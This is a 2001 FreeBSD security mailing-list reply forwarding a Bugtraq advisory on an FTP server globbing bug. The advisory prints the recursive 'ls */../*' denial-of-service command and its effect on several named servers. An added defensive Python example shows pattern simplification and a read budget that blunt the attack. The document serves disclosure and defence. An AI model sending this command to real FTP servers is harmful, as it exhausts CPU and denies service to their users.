Date: Fri, 16 Mar 2001 13:56:08 -0000
From: Lee Smallbone <lee@kechara.net>
To: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <200103161502.PAA16561@mailgate.kechara.net>
4.2-RELEASE, regular user, regular home directory

(snipped)
/../www/62.49.139.3_3-year.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.html
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/btareshit.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.old
226 Transfer complete.
ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec.
ftp>

15/03/2001 22:21:16, Attila Nagy <bra@fsn.hu> wrote:
>FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
>-STABLE.
>
>---------- Forwarded message ----------
>Date: Thu, 15 Mar 2001 09:34:09 +0100
>From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
>To: BUGTRAQ@SECURITYFOCUS.COM
>Subject: Multiple vendors FTP denial of service
>
>- Proftpd built-in 'ls' command has a globbing bug that allows remote
>denial-of-service.
>
> Here's a simple exploit, tested on the Proftpd site :
>
>$ ftp ftp.proftpd.org
>...
>Name (ftp.proftpd.org:j): ftp
>...
>230 Anonymous access granted, restrictions apply.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 Entering Passive Mode (216,10,40,219,4,111).
>421 Service not available, remote server timed out. Connection closed
>
> That command takes 100% CPU time on the server. It can lead to an easy
>DOS even if few remote simultaneous connections are allowed.
>
> Other FTP servers may be concerned as well. Here are various tries :
>
>- NetBSD FTP showed the same behavior as Proftpd :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>200 EPRT command successful.
>(long delay)
>421 Service not available, remote server timed out. Connection closed
>
>So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
>possible DOS. Other BSD FTP may be affected as well.
>
>- Microsoft FTP Service (Version 5.0) seems also confused by the command :
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>500 'EPSV': command not understood
>227 Entering Passive Mode (207,46,133,140,4,223).
>200 PORT command successful.
>150 Opening ASCII mode data connection for file list.
>(very long delay... nothing happens...)
>
>- Publicfile refuses the command :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 =131,193,178,181,97,222
>550 Sorry, I can't open that file: file does not exist.
>
>- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
>displayed.
>
>- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
>expression to *" and the 'ls *' output.
>
>
> Maintainers of vulnerable servers have been warned of this bug.
>
>--
> -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
> LINAGORA SA (Paris, France) : http://www.linagora.com
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>

--
Lee Smallbone
Kechara Internet
lee@kechara.net
www.kechara.net
Tel: (01243) 869 969
Fax: (01243) 866 685
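The two defences the thread describes, as an added example that is not code from this thread or from any of the servers it names: the pattern rewrite that PureFTPd's "Simplified wildcard expression to *" reply points at (every `<wildcard>/..` pair names the directory the wildcard was evaluated in, so the pattern collapses to a plain `*`), and a per-command budget on directory reads so that any pattern which still fans out is refused after a fixed cost instead of pinning the CPU. The function names, `MAX_GLOB_READS`, and the sample directory tree are all assumptions of this example; the tree is constructed in a temporary directory and the "raw" pattern uses four wildcard hops rather than the advisory's twelve so the numbers stay small.

```python
import fnmatch
import os
import posixpath
import shutil
import tempfile
from typing import NamedTuple

WILDCARD_CHARS = "*?["
MAX_GLOB_READS = 1000  # assumed budget for one 'ls'; tune per deployment


class GlobBudgetExceeded(Exception):
    """Expanding the pattern would list more directories than the budget allows."""


class GlobResult(NamedTuple):
    matches: list
    reads: int  # directory listings performed


def is_wild(segment):
    return any(c in segment for c in WILDCARD_CHARS)


def simplify_glob(pattern):
    """Collapse '<wildcard>/..' pairs, then normalise the literal '..' segments.

    '*/..' is the directory the '*' was evaluated in, so '*/../*/../*' names the
    same entries as '*' (once per subdirectory under strict glob rules, which is
    exactly the blow-up). The only difference: the strict form matches nothing in
    a directory that has no subdirectories.
    """
    absolute = pattern.startswith("/")
    stack = []
    for seg in pattern.split("/"):
        if seg in ("", "."):
            continue
        if seg == ".." and stack and is_wild(stack[-1]):
            stack.pop()  # '*/..' is where we already were
            continue
        stack.append(seg)
    return posixpath.normpath(("/" if absolute else "") + "/".join(stack))


def bounded_glob(root, pattern, budget=MAX_GLOB_READS):
    """Expand `pattern` below `root` one segment at a time, counting directory reads.

    Raises GlobBudgetExceeded before the (budget+1)th listing, so a hostile pattern
    costs at most `budget` reads. Results stay relative to `root`; '..' cannot climb above it.
    """
    segments = [s for s in pattern.split("/") if s and s != "."]
    reads = 0
    matches = []

    def expand(rel, idx):
        nonlocal reads
        if idx == len(segments):
            matches.append(rel)
            return
        seg = segments[idx]
        here = os.path.join(root, rel)
        if not is_wild(seg):
            # Literal segment: a single existence check, no listing.
            if seg == ".." and not os.path.isdir(here):
                return  # 'file/..' is not a directory path
            nxt = posixpath.normpath(posixpath.join(rel, seg))
            if nxt == ".." or nxt.startswith("../"):
                return  # would escape the root
            if os.path.lexists(os.path.join(root, nxt)):
                expand(nxt, idx + 1)
            return
        if not os.path.isdir(here):
            return
        reads += 1
        if reads > budget:
            raise GlobBudgetExceeded(f"{pattern!r} needs more than {budget} directory reads")
        for name in sorted(os.listdir(here)):
            if name.startswith(".") and not seg.startswith("."):
                continue  # dotfiles only match an explicit leading dot
            if fnmatch.fnmatchcase(name, seg):
                expand(posixpath.normpath(posixpath.join(rel, name)), idx + 1)

    expand(".", 0)
    return GlobResult(matches, reads)


def build_demo_tree():
    """Constructed sample tree: two subdirectories and one top-level file."""
    root = tempfile.mkdtemp(prefix="ftpglob-")
    for d, files in {"www": ["a.html", "b.png"], "docs": ["readme.txt"]}.items():
        os.mkdir(os.path.join(root, d))
        for f in files:
            open(os.path.join(root, d, f), "w").close()
    open(os.path.join(root, "notes.txt"), "w").close()
    return root


def demo():
    """Cost of a raw advisory-shaped pattern versus its simplified form."""
    root = build_demo_tree()
    raw = "*/../*/../*/../*"  # constructed: 4 wildcard hops; the advisory used 12
    try:
        unbounded = bounded_glob(root, raw, budget=10_000)
        try:
            bounded_glob(root, raw, budget=10)
            cut_off = False
        except GlobBudgetExceeded:
            cut_off = True
        simplified = bounded_glob(root, simplify_glob(raw), budget=10)
    finally:
        shutil.rmtree(root)
    return {
        "raw_reads": unbounded.reads,                      # 1 + 2 + 4 + 8 = 15
        "raw_matches": len(unbounded.matches),             # 8 paths back at '.', 3 entries each
        "cut_off_at_budget_10": cut_off,
        "simplified_pattern": simplify_glob(raw),          # '*'
        "simplified_reads": simplified.reads,              # 1
        "simplified_matches": sorted(simplified.matches),
    }
```

On this three-entry tree the raw four-hop pattern already costs 15 directory listings and yields 24 duplicate matches, doubling with every extra `*/..` hop; with the twelve hops in the posted command that is thousands of reads even here, and far more on a real anonymous mirror with many subdirectories. Either defence alone keeps the cost flat: the rewrite turns the command into `ls *` (one read), and the budget refuses the unrewritten form after ten reads. Applying both, as the example does, means a pattern the rewrite does not recognise is still bounded.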